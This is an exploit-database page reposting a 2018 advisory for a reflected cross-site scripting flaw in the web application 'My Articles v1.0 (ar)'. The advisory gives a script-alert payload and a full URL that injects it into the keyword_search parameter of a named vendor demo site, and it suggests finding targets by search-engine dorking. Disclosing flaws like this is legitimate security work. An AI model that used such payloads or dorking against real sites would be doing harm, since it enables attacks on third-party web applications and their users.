Advertisement






My Articles v 1.0 (ar) XSS Vulnerability

CVE Category Price Severity
N/A CWE-79 Unknown Unknown
Author Risk Exploitation Type Date
Unknown Unknown Remote 2018-01-19
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018010185

Below is a copy:

My Articles v 1.0 (ar) XSS Vulnerability
============================================================================================================================
| # Title     : My Articles v 1.0 (ar) XSS Vulnerability                                                                   |
| # Author    : indoushka                                                                                                  |
| # email     : [email protected]                                                                                   |
| # Tested on : windows 10 Franais V.(Pro)                                                                                |
| # Version   : 1.0                                                                                                        |
| # Vendor    : https://www.arab-programs.club/download.html                                                               |  
| # Dork      : n/a                                                                                                        |
============================================================================================================================

poc :


[+] Dorking n Google Or Other Search Enggine 

[+] use payload : <script>alert(/indoushka/);</script>

https://www.arab-programs.club/demo/index.php?keyword_search=e%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E&page=results&proceed_search=1

Greetz :----------------------------------------------------------------------------------------
                                                                                               |
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic              |
                                                                                               |
================================================================================================

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum